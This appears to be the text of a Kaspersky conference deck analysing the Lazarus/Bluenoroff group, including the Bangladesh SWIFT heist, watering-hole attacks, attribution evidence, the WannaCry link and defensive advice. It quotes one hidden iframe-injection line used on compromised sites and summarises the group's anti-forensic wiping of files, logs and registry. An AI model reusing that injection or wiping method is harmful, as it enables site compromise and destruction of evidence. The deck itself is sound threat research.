Chasing the Bad Guys from Bangladesh to Costa Rica · Chasing the Bad Guys from Bangladesh to Costa...

SESSION ID:SESSION ID:

Vitaly Kamluk

Chasing the Bad Guys from Bangladesh to Costa Rica

FLE-R01

Director of APAC Research Centre,Kaspersky Lab@vkamluk

# whoami

Few words about the author

Presenter’s Company Logo – replace or

delete on master slide

# whoami

Eugene KasperskyVitaly Kamluk

12+ years at Kaspersky Lab2 years at INTERPOL

Focus:Malware AnalysisIncident ResponseDigital Forensics

Position:Head of security researchers in APAC region

Attacks Evolution

Quick overview and latest figures

1NEW VIRUS EVERY HOUR

1NEW VIRUS EVERY MINUTE

1NEW VIRUS EVERY SECOND

323,000NEW SAMPLES EVERY DAY

THE SCALE OF THE THREAT

90%Traditional cybercrime

Targeted threats to organisations

Cyber-weapons

Targeted attacks

THE NATURE OF THE THREAT

Exploitkits

Social networks

HOW MALWARE SPREADS

TARGETED ATTACK RESEARCHES

Darkhotel- part 2

MsnMMCampaigns

SatelliteTurla

WildNeutron

BlueTermite

SpringDragon

Stuxnet

miniFlame

NetTraveler

Miniduke

RedOctober

Icefog

Winnti

Kimsuky

TeamSpy

Epic Turla

CosmicDuke

Careto / The Mask

Energetic Bear / Crouching Yeti

Darkhotel

Desert Falcons

Hellsing

Sofacy

Carbanak

Equation

Naikon

AnimalFarm

Duqu 2.0

ProjectSauron

Saguaro

StrongPity

Fruity Armor

ScarCruft

Poseidon

Lazarus

Adwind

Dropping Elephant

We discover and dissect the world’s most sophisticated threats

Bangladesh Hack

The story of one of the biggest cyberheists in history

THE FIRST ANNOUNCEMENTS

SCHEMATICS OF CYBER HEIST

US BANK Compromised BankCorr. Account

Offshore Bank

Attacker

SCHEMATICS OF CYBER HEIST

US BANK Compromised BankCorr. Account

Offshore Bank Attacker

Watershed event for SWIFT and the global financial industry

High level of sophistication / knowledge – hiding of business/application evidence

• Deletion of fraudulent payment instructions from database

• Modification of SWIFT messages (end/start of day statements)

• Bypass of integrity verification checks

Customer Security Programme

BANGLADESH BANK INCIDENT

The SWIFT Network and connections to the SWIFT network have not been compromised

SWIFT does not rely on the customer’s security to secure the SWIFT Network

Each customer is responsible and accountable for protecting its local environment and access to SWIFT

NOTES FROM SWIFT

LAZARUS!

What is this Lazarus actor?

SONY PICTURES INCIDENT (2014)

Credits: Novetta

OPERATION BLOCKBUSTER (2016)

Courtesy of Novetta

PREVIOUS CAMPAIGNS

BUT WAS IT REALLY LAZARUS?

Let’s find that out

PREVIOUS RESEARCH

Vietnam Bangladesh

Lazarus

Compromised webserver

20172015

Philippines

Wiper Wiper

Text String

Poland

A BETTER PROOF

Vietnam Bangladesh

Compromised webserver

20172015

South EastAsia

Patched filesConfig file formatOperation time

Poland, Mexico, and

others

Africa,Costa Rica

Overall designC2 ProtocolOwn PE-loaderImport resolution

Trace formatRC4 key

Lazarus

Philippines

Wiper Wiper

Text String

Poland, Mexico, and

others

WORLDWIDE DETECTIONSBangladeshTaiwanVietnamThailandIraqMalaysiaIndonesiaIndiaPolandEthiopiaNigeriaGabonKenyaUruguayMexicoChileBrazilChileCosta Rica

Casinos

Investment Firms

CryptocurrencyBussinesses

source: KSN

INFECTION VECTOR

How do they get in?

WATERING HOLE ATTACKS

Polish website Mexican website

MALICIOUS CODE INJECTION

document.write("<div width='0px' height='0px'><iframewidth='145px'height='146px'style='left:-2144px; position:absolute; top:0px;'src='https://[PATH]/view.jsp?pagenum=1'..>

</iframe></div>");

SITE REDIRECTION

iframe

Governmentwebsite

Visitors

JScript Exploit

Other compromisedwebsite

TargetList

MAP OF TARGETS

OTHER TARGETS

Who else do they hit?

More illegal profit

Mining cryptocurrency on other compromised hosts

Two crypto-currency businesses compromised

63+ ATMs were infected in South Korea

Two Korean local ATM vendors breached

EMV credit card writer software backdooredDistributed via hacking/carder forums

TACTICS

Some of interesting techniques

ANTI-FORENSIC TECHNIQUES

• Wiping files securely:• overwrite file with random pattern;• rename file to a random name;• delete the file using system API;• repeatedly create and delete new files

• Wiping registry values securely:• overwrite value with random pattern;• delete the registry value;• apply the same to all keys recursively.

• Self-cleanup:• wipe temp files, configs, components

• Wiping prefetch files.• Wiping event log files.

• initiate event log backup • the system releases the file lock;

• wipe file securely.• DLL unloading and self-removal:

• use minimalistic 5Kb DLL to do initiate external unloading and memory cleaning.

ANTI-FORENSIC TECHNIQUES

Password Protection 20-31 alpha-numeric charactersDiscovered passwords:

Isolated subnetfor SWIFT

InternalIT system

LoaderEncrypted Payload

KeyloggerComponent Isolation

WHO ARE THEY?

What else we know about them

BLUENOROFF: A LAZARUS UNIT

Cyber Espionage

Cyber Sabotage

Money Theft

Data Exfiltration

C2 Operation

Infiltration

Backdoors Development

Wiping Attacks

Cryptocurrency Mining

Lazarus

Bluenorroff

COMPARING THE CODE

No obfuscationStandard import resolutionNon-packed code*No network communicationSecure file-wipingEnglish languageExecution tracingRegular engineering operationNo visible false flagsNever used VirusTotal

Custom code obfuscatorObscured import resolution

Commercial packers (i.e. Enigma, Obsidium)Communication with C2 + Infrastructure support

Full scale of anti-forensicsKorean+English language

No execution tracingDisguise and stealthFalse flag operations

Uses VirusTotal

LAZARUS CODE BLUENOROFF CODE

LANGUAGE ARTEFACTS

Some Not Bad English

execute_nroff(%s) - success with exit_code=%08Xcopying to %s failed with error=%d[FOXIT_READER] : Successfully copied to %sPDFModulation failed, so logclear will be executed.Executing real foxit reader with CommandLine = %s.[LOG_CLEAR] : failed to delete source file.Receiver :Sender :DO_NOT_USE_MMexecute_nroff(%s) - success with exit_code=%08Xexecute_nroff(%s) - failed with error=%dcopy failed [%s]-[%s] with error = %dcopy success [%s]-[%s]backup_file(%s, %s, %d)=%dPatchMemory(%s, %d)[WorkMemory] pid=%d, name=%s

Korean Locale

FALSE FLAGS

3. Backdoor Commands

kliyent2pondklyuchit ssylka ustanavlivat poluchit

pereslat derzhat vykhodit Nachalo

1. Exploit code

chainik babaLEna geigeigei3raza daiadreschainika

2. Enigma Protector

THE BIGGEST OPSEC FAILURE

From the server logs of a C2 in Europe:

2017-01-18 02:54: Apache Tomcat started on port 80802017-01-18 04:10: HTTP GET view.jsp (via VPN in France)2017-01-18 04:10: Testing bot (via VPN in France)...2017-01-18 08:12: Testing bot (via VPN in Korea)...2017-01-18 11:12: Testing bot (from IP in North Korea)

175.45.***.***inetnum: 175.45.176.0 - 175.45.179.255netname: STAR-KPdescr: Ryugyong-dongdescr: Potong-gang Districtrole: STAR JOINT VENTURE CO LTDaddress: Ryugyong-dong Potong-gang Districtcountry: KP

RECENT CONFIRMATION

Source: Group-IB

ATTRIBUTION CONCLUSIONS

1. Someone invested huge amount of money to frame NK*. *less likely.

2. A third force could be involved to help NK from the outside.

3. If this is truly North Korea, it means we know very little about their current motivation and use of cyber offense.

THE LAST DROP

One more thing…

WANNACRY

ATTRIBUTION

Visible Code Flow Similarity

OBSOLETE LIBRARY

WannaCry socket setup

Lazarus socket setup

API address resolution (dynamic import)

DYNAMIC IMPORTS

CONCLUSIONS

• LAZARUS is one of the most aggressive and persistent APT groups.• They have support of dozens (or hundreds?) of people.• Their unusual financial motivation makes them different from other actors.• Public exposure doesn’t stop them for long.• They seem to switch to hacking and recruiting other hackers.• They have no obligations, no code of conduct, no moral principles.

RECOMMENDATIONS

Common best practice against APT attacks:• Make sure you update your software. TEST IT!• Segregate your networks• Record your netflow (or whole traffic if you can)• Use endpoint security solutions, firewalls, etc, but DO MONITOR ALERTS.

• In case of ANY minor infection – get to the ROOT CAUSE of it.

ADVANCED RECOMMENDATIONS

Advanced techniques against APT attacks:• Enable extensive logging (hint: deploy sysmon)• Use honeypots and home-built deception• Use custom set of yara rules (hint: create own yara rules)

• Scan network traffic• Scan and identify reliably all new malware/adware/etc

• Hint: sometimes “adware” is not what it seems• Hint: if you cannot identify the file:

• Ask VirusTotal• Search online• Ask security researchers

HOW TO CHANGE GLOBAL SECURITY LANDSCAPE?What we do and what you could do too.

Expert Police

CONNECTING PRIVATE SECTOR TO POLICE

270Mb 350Mb 750Mb

Minimal

Optimal

Maximal

features

BITSCOUT FLAVORS

Remote Location

Expert

Step 1.

Step 2.Step 3.

Trusted ServerTerminal Access

OwnerPolice

REMOTE ASSISTANCE IN A NUTSHELL

Expert

A remote system

Virtual HDD

Virtual host

Physical host

Real HDD

Root shell

Police

SOLVING THE PROBLEM OF TRUST

• Minimal and robust• Runs on any old and new hardware• Records remote user sessions• Device access authorized by the owner• Provides multi-user sessions• Perfect for education

• Lets you build YOUR OWN OS!• FREE for all and OPEN-SOURCE! github.com/vitaly-kamluk

Download Bitscout here:

BITSCOUT FEATURES

THANK YOU!

Vitaly Kamluk, Kaspersky Lab

@vkamlukgithub.com/vitaly-kamluk

Chasing the Bad Guys from Bangladesh to Costa Rica · Chasing the Bad Guys from Bangladesh to Costa...

Documents

PERIODICITY Guys, Groups, Trends, Creations Guys

The Top 10 Deadly Mistakes Guys someone says the word "chasing" it's very important that you understand what it means. When you're talking about dating, the word chasing is basically

Chasing Inspiration

30 years living a happy life - Breaking Systems, Chasing Bad Guys and Teaching People about Internet Security

Chasing the Light

Chasing Waves

Chasing Cars

Chasing Jupiter

chasing pavements.pdf

Ideas Chasing Money Vs. Money Chasing Ideas

chasing windmills

Chasing Salander

Chasing Diamonds

Chasing Rainbows Chasing Rainbows ~ Go West!

Chasing Flight

Chasing Infinity

chasing wonder

Chasing wasps

Chasing Waste

Debt Chasing